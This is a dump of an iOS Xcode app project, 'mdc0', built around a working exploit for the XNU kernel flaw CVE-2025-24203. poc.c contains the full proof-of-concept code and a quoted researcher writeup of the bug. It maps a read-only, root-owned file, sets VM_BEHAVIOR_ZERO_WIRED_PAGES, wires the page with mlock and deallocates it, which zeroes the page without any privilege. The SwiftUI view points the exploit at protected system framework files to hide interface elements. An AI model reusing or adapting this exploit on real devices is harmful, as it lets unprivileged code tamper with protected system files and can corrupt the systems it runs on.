Project Path: arc_gmh5225_mdc0_nptv86dk

Source Tree:

```txt
arc_gmh5225_mdc0_nptv86dk
├── README.md
├── mdc0
│   ├── Assets.xcassets
│   │   ├── AccentColor.colorset
│   │   │   └── Contents.json
│   │   ├── AppIcon.appiconset
│   │   │   └── Contents.json
│   │   └── Contents.json
│   ├── ContentView.swift
│   ├── Preview Content
│   │   └── Preview Assets.xcassets
│   │       └── Contents.json
│   ├── mdc0-Bridging-Header.h
│   ├── mdc0App.swift
│   └── poc.c
└── mdc0.xcodeproj
    ├── project.pbxproj
    ├── project.xcworkspace
    │   ├── contents.xcworkspacedata
    │   └── xcuserdata
    │       └── huynguyen.xcuserdatad
    │           └── UserInterfaceState.xcuserstate
    └── xcuserdata
        └── huynguyen.xcuserdatad
            └── xcschemes
                └── xcschememanagement.plist

```

`README.md`:

```md
# MDC0

CVE-2025-24203

Support iOS 15.0 - 18.3.2, you need to respring by hand to take effect using Library trick

```

`mdc0.xcodeproj/project.pbxproj`:

```pbxproj
// !$*UTF8*$!
{
	archiveVersion = 1;
	classes = {
	};
	objectVersion = 77;
	objects = {

/* Begin PBXFileReference section */
		0005C51F2DCDEB1400E6A190 /* mdc0.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = mdc0.app; sourceTree = BUILT_PRODUCTS_DIR; };
/* End PBXFileReference section */

/* Begin PBXFileSystemSynchronizedRootGroup section */
		0005C5212DCDEB1400E6A190 /* mdc0 */ = {
			isa = PBXFileSystemSynchronizedRootGroup;
			path = mdc0;
			sourceTree = "<group>";
		};
/* End PBXFileSystemSynchronizedRootGroup section */

/* Begin PBXFrameworksBuildPhase section */
		0005C51C2DCDEB1400E6A190 /* Frameworks */ = {
			isa = PBXFrameworksBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
		};
/* End PBXFrameworksBuildPhase section */

/* Begin PBXGroup section */
		0005C5162DCDEB1400E6A190 = {
			isa = PBXGroup;
			children = (
				0005C5212DCDEB1400E6A190 /* mdc0 */,
				0005C5202DCDEB1400E6A190 /* Products */,
			);
			sourceTree = "<group>";
		};
		0005C5202DCDEB1400E6A190 /* Products */ = {
			isa = PBXGroup;
			children = (
				0005C51F2DCDEB1400E6A190 /* mdc0.app */,
			);
			name = Products;
			sourceTree = "<group>";
		};
/* End PBXGroup section */

/* Begin PBXNativeTarget section */
		0005C51E2DCDEB1400E6A190 /* mdc0 */ = {
			isa = PBXNativeTarget;
			buildConfigurationList = 0005C52D2DCDEB1600E6A190 /* Build configuration list for PBXNativeTarget "mdc0" */;
			buildPhases = (
				0005C51B2DCDEB1400E6A190 /* Sources */,
				0005C51C2DCDEB1400E6A190 /* Frameworks */,
				0005C51D2DCDEB1400E6A190 /* Resources */,
			);
			buildRules = (
			);
			dependencies = (
			);
			fileSystemSynchronizedGroups = (
				0005C5212DCDEB1400E6A190 /* mdc0 */,
			);
			name = mdc0;
			packageProductDependencies = (
			);
			productName = mdc0;
			productReference = 0005C51F2DCDEB1400E6A190 /* mdc0.app */;
			productType = "com.apple.product-type.application";
		};
/* End PBXNativeTarget section */

/* Begin PBXProject section */
		0005C5172DCDEB1400E6A190 /* Project object */ = {
			isa = PBXProject;
			attributes = {
				BuildIndependentTargetsInParallel = 1;
				LastSwiftUpdateCheck = 1620;
				LastUpgradeCheck = 1620;
				TargetAttributes = {
					0005C51E2DCDEB1400E6A190 = {
						CreatedOnToolsVersion = 16.2;
						LastSwiftMigration = 1620;
					};
				};
			};
			buildConfigurationList = 0005C51A2DCDEB1400E6A190 /* Build configuration list for PBXProject "mdc0" */;
			developmentRegion = en;
			hasScannedForEncodings = 0;
			knownRegions = (
				en,
				Base,
			);
			mainGroup = 0005C5162DCDEB1400E6A190;
			minimizedProjectReferenceProxies = 1;
			preferredProjectObjectVersion = 77;
			productRefGroup = 0005C5202DCDEB1400E6A190 /* Products */;
			projectDirPath = "";
			projectRoot = "";
			targets = (
				0005C51E2DCDEB1400E6A190 /* mdc0 */,
			);
		};
/* End PBXProject section */

/* Begin PBXResourcesBuildPhase section */
		0005C51D2DCDEB1400E6A190 /* Resources */ = {
			isa = PBXResourcesBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
		};
/* End PBXResourcesBuildPhase section */

/* Begin PBXSourcesBuildPhase section */
		0005C51B2DCDEB1400E6A190 /* Sources */ = {
			isa = PBXSourcesBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
		};
/* End PBXSourcesBuildPhase section */

/* Begin XCBuildConfiguration section */
		0005C52B2DCDEB1600E6A190 /* Debug */ = {
			isa = XCBuildConfiguration;
			buildSettings = {
				ALWAYS_SEARCH_USER_PATHS = NO;
				ASSETCATALOG_COMPILER_GENERATE_SWIFT_ASSET_SYMBOL_EXTENSIONS = YES;
				CLANG_ANALYZER_NONNULL = YES;
				CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE;
				CLANG_CXX_LANGUAGE_STANDARD = "gnu++20";
				CLANG_ENABLE_MODULES = YES;
				CLANG_ENABLE_OBJC_ARC = YES;
				CLANG_ENABLE_OBJC_WEAK = YES;
				CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES;
				CLANG_WARN_BOOL_CONVERSION = YES;
				CLANG_WARN_COMMA = YES;
				CLANG_WARN_CONSTANT_CONVERSION = YES;
				CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES;
				CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;
				CLANG_WARN_DOCUMENTATION_COMMENTS = YES;
				CLANG_WARN_EMPTY_BODY = YES;
				CLANG_WARN_ENUM_CONVERSION = YES;
				CLANG_WARN_INFINITE_RECURSION = YES;
				CLANG_WARN_INT_CONVERSION = YES;
				CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES;
				CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES;
				CLANG_WARN_OBJC_LITERAL_CONVERSION = YES;
				CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;
				CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES;
				CLANG_WARN_RANGE_LOOP_ANALYSIS = YES;
				CLANG_WARN_STRICT_PROTOTYPES = YES;
				CLANG_WARN_SUSPICIOUS_MOVE = YES;
				CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE;
				CLANG_WARN_UNREACHABLE_CODE = YES;
				CLANG_WARN__DUPLICATE_METHOD_MATCH = YES;
				COPY_PHASE_STRIP = NO;
				DEBUG_INFORMATION_FORMAT = dwarf;
				ENABLE_STRICT_OBJC_MSGSEND = YES;
				ENABLE_TESTABILITY = YES;
				ENABLE_USER_SCRIPT_SANDBOXING = YES;
				GCC_C_LANGUAGE_STANDARD = gnu17;
				GCC_DYNAMIC_NO_PIC = NO;
				GCC_NO_COMMON_BLOCKS = YES;
				GCC_OPTIMIZATION_LEVEL = 0;
				GCC_PREPROCESSOR_DEFINITIONS = (
					"DEBUG=1",
					"$(inherited)",
				);
				GCC_WARN_64_TO_32_BIT_CONVERSION = YES;
				GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR;
				GCC_WARN_UNDECLARED_SELECTOR = YES;
				GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE;
				GCC_WARN_UNUSED_FUNCTION = YES;
				GCC_WARN_UNUSED_VARIABLE = YES;
				IPHONEOS_DEPLOYMENT_TARGET = 18.2;
				LOCALIZATION_PREFERS_STRING_CATALOGS = YES;
				MTL_ENABLE_DEBUG_INFO = INCLUDE_SOURCE;
				MTL_FAST_MATH = YES;
				ONLY_ACTIVE_ARCH = YES;
				SDKROOT = iphoneos;
				SWIFT_ACTIVE_COMPILATION_CONDITIONS = "DEBUG $(inherited)";
				SWIFT_OPTIMIZATION_LEVEL = "-Onone";
			};
			name = Debug;
		};
		0005C52C2DCDEB1600E6A190 /* Release */ = {
			isa = XCBuildConfiguration;
			buildSettings = {
				ALWAYS_SEARCH_USER_PATHS = NO;
				ASSETCATALOG_COMPILER_GENERATE_SWIFT_ASSET_SYMBOL_EXTENSIONS = YES;
				CLANG_ANALYZER_NONNULL = YES;
				CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE;
				CLANG_CXX_LANGUAGE_STANDARD = "gnu++20";
				CLANG_ENABLE_MODULES = YES;
				CLANG_ENABLE_OBJC_ARC = YES;
				CLANG_ENABLE_OBJC_WEAK = YES;
				CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES;
				CLANG_WARN_BOOL_CONVERSION = YES;
				CLANG_WARN_COMMA = YES;
				CLANG_WARN_CONSTANT_CONVERSION = YES;
				CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES;
				CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;
				CLANG_WARN_DOCUMENTATION_COMMENTS = YES;
				CLANG_WARN_EMPTY_BODY = YES;
				CLANG_WARN_ENUM_CONVERSION = YES;
				CLANG_WARN_INFINITE_RECURSION = YES;
				CLANG_WARN_INT_CONVERSION = YES;
				CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES;
				CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES;
				CLANG_WARN_OBJC_LITERAL_CONVERSION = YES;
				CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;
				CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES;
				CLANG_WARN_RANGE_LOOP_ANALYSIS = YES;
				CLANG_WARN_STRICT_PROTOTYPES = YES;
				CLANG_WARN_SUSPICIOUS_MOVE = YES;
				CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE;
				CLANG_WARN_UNREACHABLE_CODE = YES;
				CLANG_WARN__DUPLICATE_METHOD_MATCH = YES;
				COPY_PHASE_STRIP = NO;
				DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym";
				ENABLE_NS_ASSERTIONS = NO;
				ENABLE_STRICT_OBJC_MSGSEND = YES;
				ENABLE_USER_SCRIPT_SANDBOXING = YES;
				GCC_C_LANGUAGE_STANDARD = gnu17;
				GCC_NO_COMMON_BLOCKS = YES;
				GCC_WARN_64_TO_32_BIT_CONVERSION = YES;
				GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR;
				GCC_WARN_UNDECLARED_SELECTOR = YES;
				GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE;
				GCC_WARN_UNUSED_FUNCTION = YES;
				GCC_WARN_UNUSED_VARIABLE = YES;
				IPHONEOS_DEPLOYMENT_TARGET = 18.2;
				LOCALIZATION_PREFERS_STRING_CATALOGS = YES;
				MTL_ENABLE_DEBUG_INFO = NO;
				MTL_FAST_MATH = YES;
				SDKROOT = iphoneos;
				SWIFT_COMPILATION_MODE = wholemodule;
				VALIDATE_PRODUCT = YES;
			};
			name = Release;
		};
		0005C52E2DCDEB1600E6A190 /* Debug */ = {
			isa = XCBuildConfiguration;
			buildSettings = {
				ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;
				ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor;
				CLANG_ENABLE_MODULES = YES;
				CODE_SIGN_STYLE = Automatic;
				CURRENT_PROJECT_VERSION = 1;
				DEVELOPMENT_ASSET_PATHS = "\"mdc0/Preview Content\"";
				DEVELOPMENT_TEAM = 76QDYF5NP6;
				ENABLE_PREVIEWS = YES;
				GENERATE_INFOPLIST_FILE = YES;
				INFOPLIST_KEY_UIApplicationSceneManifest_Generation = YES;
				INFOPLIST_KEY_UIApplicationSupportsIndirectInputEvents = YES;
				INFOPLIST_KEY_UILaunchScreen_Generation = YES;
				INFOPLIST_KEY_UISupportedInterfaceOrientations_iPad = "UIInterfaceOrientationPortrait UIInterfaceOrientationPortraitUpsideDown UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight";
				INFOPLIST_KEY_UISupportedInterfaceOrientations_iPhone = "UIInterfaceOrientationPortrait UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight";
				IPHONEOS_DEPLOYMENT_TARGET = 15.0;
				LD_RUNPATH_SEARCH_PATHS = (
					"$(inherited)",
					"@executable_path/Frameworks",
				);
				MARKETING_VERSION = 1.0;
				PRODUCT_BUNDLE_IDENTIFIER = com.34306.mdc0;
				PRODUCT_NAME = "$(TARGET_NAME)";
				SWIFT_EMIT_LOC_STRINGS = YES;
				SWIFT_OBJC_BRIDGING_HEADER = "mdc0/mdc0-Bridging-Header.h";
				SWIFT_OPTIMIZATION_LEVEL = "-Onone";
				SWIFT_VERSION = 5.0;
				TARGETED_DEVICE_FAMILY = "1,2";
			};
			name = Debug;
		};
		0005C52F2DCDEB1600E6A190 /* Release */ = {
			isa = XCBuildConfiguration;
			buildSettings = {
				ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;
				ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor;
				CLANG_ENABLE_MODULES = YES;
				CODE_SIGN_STYLE = Automatic;
				CURRENT_PROJECT_VERSION = 1;
				DEVELOPMENT_ASSET_PATHS = "\"mdc0/Preview Content\"";
				DEVELOPMENT_TEAM = 76QDYF5NP6;
				ENABLE_PREVIEWS = YES;
				GENERATE_INFOPLIST_FILE = YES;
				INFOPLIST_KEY_UIApplicationSceneManifest_Generation = YES;
				INFOPLIST_KEY_UIApplicationSupportsIndirectInputEvents = YES;
				INFOPLIST_KEY_UILaunchScreen_Generation = YES;
				INFOPLIST_KEY_UISupportedInterfaceOrientations_iPad = "UIInterfaceOrientationPortrait UIInterfaceOrientationPortraitUpsideDown UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight";
				INFOPLIST_KEY_UISupportedInterfaceOrientations_iPhone = "UIInterfaceOrientationPortrait UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight";
				IPHONEOS_DEPLOYMENT_TARGET = 15.0;
				LD_RUNPATH_SEARCH_PATHS = (
					"$(inherited)",
					"@executable_path/Frameworks",
				);
				MARKETING_VERSION = 1.0;
				PRODUCT_BUNDLE_IDENTIFIER = com.34306.mdc0;
				PRODUCT_NAME = "$(TARGET_NAME)";
				SWIFT_EMIT_LOC_STRINGS = YES;
				SWIFT_OBJC_BRIDGING_HEADER = "mdc0/mdc0-Bridging-Header.h";
				SWIFT_VERSION = 5.0;
				TARGETED_DEVICE_FAMILY = "1,2";
			};
			name = Release;
		};
/* End XCBuildConfiguration section */

/* Begin XCConfigurationList section */
		0005C51A2DCDEB1400E6A190 /* Build configuration list for PBXProject "mdc0" */ = {
			isa = XCConfigurationList;
			buildConfigurations = (
				0005C52B2DCDEB1600E6A190 /* Debug */,
				0005C52C2DCDEB1600E6A190 /* Release */,
			);
			defaultConfigurationIsVisible = 0;
			defaultConfigurationName = Release;
		};
		0005C52D2DCDEB1600E6A190 /* Build configuration list for PBXNativeTarget "mdc0" */ = {
			isa = XCConfigurationList;
			buildConfigurations = (
				0005C52E2DCDEB1600E6A190 /* Debug */,
				0005C52F2DCDEB1600E6A190 /* Release */,
			);
			defaultConfigurationIsVisible = 0;
			defaultConfigurationName = Release;
		};
/* End XCConfigurationList section */
	};
	rootObject = 0005C5172DCDEB1400E6A190 /* Project object */;
}

```

`mdc0.xcodeproj/project.xcworkspace/contents.xcworkspacedata`:

```xcworkspacedata
<?xml version="1.0" encoding="UTF-8"?>
<Workspace
   version = "1.0">
   <FileRef
      location = "self:">
   </FileRef>
</Workspace>

```

`mdc0.xcodeproj/xcuserdata/huynguyen.xcuserdatad/xcschemes/xcschememanagement.plist`:

```plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>SchemeUserState</key>
	<dict>
		<key>mdc0.xcscheme_^#shared#^_</key>
		<dict>
			<key>orderHint</key>
			<integer>0</integer>
		</dict>
	</dict>
</dict>
</plist>

```

`mdc0/Assets.xcassets/AccentColor.colorset/Contents.json`:

```json
{
  "colors" : [
    {
      "idiom" : "universal"
    }
  ],
  "info" : {
    "author" : "xcode",
    "version" : 1
  }
}

```

`mdc0/Assets.xcassets/AppIcon.appiconset/Contents.json`:

```json
{
  "images" : [
    {
      "idiom" : "universal",
      "platform" : "ios",
      "size" : "1024x1024"
    },
    {
      "appearances" : [
        {
          "appearance" : "luminosity",
          "value" : "dark"
        }
      ],
      "idiom" : "universal",
      "platform" : "ios",
      "size" : "1024x1024"
    },
    {
      "appearances" : [
        {
          "appearance" : "luminosity",
          "value" : "tinted"
        }
      ],
      "idiom" : "universal",
      "platform" : "ios",
      "size" : "1024x1024"
    }
  ],
  "info" : {
    "author" : "xcode",
    "version" : 1
  }
}

```

`mdc0/Assets.xcassets/Contents.json`:

```json
{
  "info" : {
    "author" : "xcode",
    "version" : 1
  }
}

```

`mdc0/ContentView.swift`:

```swift
//
//  ContentView.swift
//  mdc0
//
//  Created by Huy Nguyen on 9/5/25.
//

import SwiftUI

struct ContentView: View {
    @State private var darkDockStatus: String = ""
    @State private var lightDockStatus: String = ""
    @State private var transparentStatus: String = ""
    @State private var homeBarStatus: String = ""
    @State private var lockscreenIconsStatus: String = ""
    @State private var respringStatus: String = ""
    
    var body: some View {
        VStack(spacing: 20) {
            Image(systemName: "globe")
                .imageScale(.large)
                .foregroundStyle(.tint)
            
            VStack {
                Button("Hide Dock") {
                    // Process dark dock material
                    let darkPath = strdup("/System/Library/PrivateFrameworks/CoreMaterial.framework/dockDark.materialrecipe")
                    let darkResult = poc(darkPath)
                    darkDockStatus = darkResult == 0 ? "Success" : "Failed"
                    free(darkPath)
                    
                    // Process light dock material
                    let lightPath = strdup("/System/Library/PrivateFrameworks/CoreMaterial.framework/dockLight.materialrecipe")
                    let lightResult = poc(lightPath)
                    lightDockStatus = lightResult == 0 ? "Success" : "Failed"
                    free(lightPath)
                }
                .padding()
                .background(Color.blue)
                .foregroundColor(.white)
                .cornerRadius(10)
                
                if !darkDockStatus.isEmpty {
                    Text("Dark Dock: \(darkDockStatus)")
                        .foregroundColor(darkDockStatus == "Success" ? .green : .red)
                }
                
                if !lightDockStatus.isEmpty {
                    Text("Light Dock: \(lightDockStatus)")
                        .foregroundColor(lightDockStatus == "Success" ? .green : .red)
                }
            }
            
            VStack {
                Button("Transparent Noti & Media Player") {
                    // Process all files for transparent notifications and media player
                    let paths = [
                        "/System/Library/PrivateFrameworks/CoreMaterial.framework/platterStrokeLight.visualstyleset",
                        "/System/Library/PrivateFrameworks/CoreMaterial.framework/platterStrokeDark.visualstyleset",
                        "/System/Library/PrivateFrameworks/CoreMaterial.framework/plattersDark.materialrecipe",
                        "/System/Library/PrivateFrameworks/SpringBoardHome.framework/folderLight.materialrecipe",
                        "/System/Library/PrivateFrameworks/SpringBoardHome.framework/folderDark.materialrecipe",
                        "/System/Library/PrivateFrameworks/CoreMaterial.framework/platters.materialrecipe"
                    ]
                    
                    var successCount = 0
                    for pathString in paths {
                        let path = strdup(pathString)
                        let result = poc(path)
                        if result == 0 {
                            successCount += 1
                        }
                        free(path)
                    }
                    
                    transparentStatus = "Success: \(successCount)/\(paths.count) files processed"
                }
                .padding()
                .background(Color.purple)
                .foregroundColor(.white)
                .cornerRadius(10)
                
                if !transparentStatus.isEmpty {
                    Text(transparentStatus)
                        .foregroundColor(.green)
                }
            }
            
            VStack {
                Button("Hide Home Bar") {
                    let path = strdup("/System/Library/PrivateFrameworks/MaterialKit.framework/Assets.car")
                    let result = poc(path)
                    homeBarStatus = result == 0 ? "Success" : "Failed"
                    free(path)
                }
                .padding()
                .background(Color.orange)
                .foregroundColor(.white)
                .cornerRadius(10)
                
                if !homeBarStatus.isEmpty {
                    Text("Home Bar: \(homeBarStatus)")
                        .foregroundColor(homeBarStatus == "Success" ? .green : .red)
                }
            }
            
            VStack {
                Button("Hide LS Flash & Camera") {
                    let path = strdup("/System/Library/PrivateFrameworks/CoverSheet.framework/Assets.car")
                    let result = poc(path)
                    lockscreenIconsStatus = result == 0 ? "Success" : "Failed"
                    free(path)
                }
                .padding()
                .background(Color.cyan)
                .foregroundColor(.white)
                .cornerRadius(10)
                
                if !lockscreenIconsStatus.isEmpty {
                    Text("Lockscreen Icons: \(lockscreenIconsStatus)")
                        .foregroundColor(lockscreenIconsStatus == "Success" ? .green : .red)
                }
            }
            
            // Credit
            Text("Using CVE-2025-24203 and my old mdc/kfd stuff\nSupport iOS 15.0 - 18.3.2, you need to respring by hand to take effect using Library trick")
                .font(.caption)
                .foregroundColor(.gray)
                .padding(.top, 20)
        }
        .padding()
    }
}

#Preview {
    ContentView()
}

```

`mdc0/Preview Content/Preview Assets.xcassets/Contents.json`:

```json
{
  "info" : {
    "author" : "xcode",
    "version" : 1
  }
}

```

`mdc0/mdc0-Bridging-Header.h`:

```h
//
//  Use this file to import your target's public headers that you would like to expose to Swift.
//

int poc(char *path);
int backboard_respring(void);

```

`mdc0/mdc0App.swift`:

```swift
//
//  mdc0App.swift
//  mdc0
//
//  Created by Huy Nguyen on 9/5/25.
//

import SwiftUI

@main
struct mdc0App: App {
    var body: some Scene {
        WindowGroup {
            ContentView()
        }
    }
}

```

`mdc0/poc.c`:

```c
#if 0
XNU VM_BEHAVIOR_ZERO_WIRED_PAGES behavior allows writing to read-only pages

% python3 -c "print('A'*0x8000)" > AAAAs.txt
% chmod a-w AAAAs.txt 
% sudo chown root:wheel AAAAs.txt 

// file is read-only, owned by root and full of A's

% clang -o unwire_mlock_poc unwire_mlock_poc.c
% ./unwire_mlock_poc AAAAs.txt

// file is still read-only, owned by root, but now has some zeros :)

writeup:

VMEs define the privileges which a particular map has over particular regions of a vm_object.
(See the previous XNU vm issues I reported a few years ago plus my offensivecon 2023 presentation
for more details about that.)

The vm_behavior VM_BEHAVIOR_ZERO_WIRED_PAGES can be set by a task on any vm_entry in its map;
there are no permission checks. It causes the entry->zero_wired_pages flag to be set.

In vm_map_delete, if an entry with a non-zero wired_count is being removed from a map it gets passed to
vm_fault_unwire which looks up the page from the underlying object (using VM_PROT_NONE)

				result = vm_fault_page(
					object,
					(VME_OFFSET(entry) +
					(va - entry->vme_start)),
					VM_PROT_NONE, TRUE,
					FALSE, /* page not looked up */
					&prot, &result_page, &top_page,
					(int *)0,
					NULL, map->no_zero_fill,
					&fault_info);

and then, if zero_wired_pages is set in the entry, passes the page to pmap_zero_page:

				if (entry->zero_wired_pages) {
					pmap_zero_page(VM_PAGE_GET_PHYS_PAGE(result_page));
					entry->zero_wired_pages = FALSE;
				}

At no point either when the flag is set or when the page is zero'd are the permissions checked
or the object semantics respected - the underlying page is just zero'd at the pmap layer.

The one challenge is that you do actually need to get the page wired, and the page has to be something
interesting that's worth being able to write to.

The first observation is that it is possible and supported to wire a page only for reading; i.e. such that
reading from that page won't fault, but writing might. That means it's fine to try to wire read-only pages.

The second observation is that you can't wire pages from objects with symmetric copy semantics - this is
enforced in vm_map_wire_nested which implements the actual semantics. Symmetric objects get converted to
delay copy here, so you can't use this issue to invisibly write to symmetric copy-on-write memory.

But there are still delay copy objects which are interesting , the most obvious being the vnode pager
(i.e. files and their UBC pages.)

Directly calling mach_vm_wire requires the host_priv port (you need to be root) but mlock is unprivileged
and wraps a call to mach_vm_wire_kernel.

So putting it all together, you can open a read-only, root-owned file, mmap an interesting page of it, mark
that vm_entry as VM_BEHAVIOR_ZERO_WIRED_PAGES, mlock the page then mach_vm_deallocate the page and the
underlying UBC page backing that region in the file will get zero'd out directly at the pmap layer!

I'm pretty sure you'd be able to do something interesting with this primitive but yeah, currently an exercise for the reader ;)

PoC only tested on MacOS 15.2 (24C101) on MacBook Pro 13-inch 2019 (Intel, the one I use as a kernel debugging target)
#endif

#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>
#include <mach/mach.h>
// Removed mach_vm.h as it's unsupported in iOS

void* map_file_page_ro(char* path) {
  int fd = open(path, O_RDONLY);

  if (fd == -1) {
    printf("open failed\n");
    exit(EXIT_FAILURE);
  }

  void* mapped_at = mmap(0, PAGE_SIZE, PROT_READ, MAP_FILE | MAP_SHARED, fd, 0);

  if (mapped_at == MAP_FAILED) {
    printf("mmap failed\n");
    exit(EXIT_FAILURE);  
  }

  return mapped_at;
}

int poc(char *path) {
  kern_return_t kr;

  
  void* page = map_file_page_ro(path);

  printf("mapped file at 0x%016llx\n", (uint64_t)page);

  kr = vm_behavior_set(mach_task_self(),
                            (vm_address_t)page,
                            PAGE_SIZE,
                            VM_BEHAVIOR_ZERO_WIRED_PAGES);

  if (kr != KERN_SUCCESS) {
    printf("failed to set VM_BEHAVIOR_ZERO_WIRED_PAGES on the entry\n");
    exit(EXIT_FAILURE);
  }

  printf("set VM_BEHAVIOR_ZERO_WIRED_PAGES\n");
 
  // wire the memory
  // unlike mach_vm_wire, mlock doesn't require root 
  int mlock_err = mlock(page, PAGE_SIZE);
  if (mlock_err != 0) {
    perror("mlock failed\n");
    exit(EXIT_FAILURE);
  }
  printf("mlock success\n");

  kr = vm_deallocate(mach_task_self(),
                          (vm_address_t)page,
                          PAGE_SIZE);
  if (kr != KERN_SUCCESS) {
    printf("vm_deallocate failed: %s\n", mach_error_string(kr));
    exit(EXIT_FAILURE);
  }
  printf("deleted map entries before unwiring\n");

  return 0;
}

```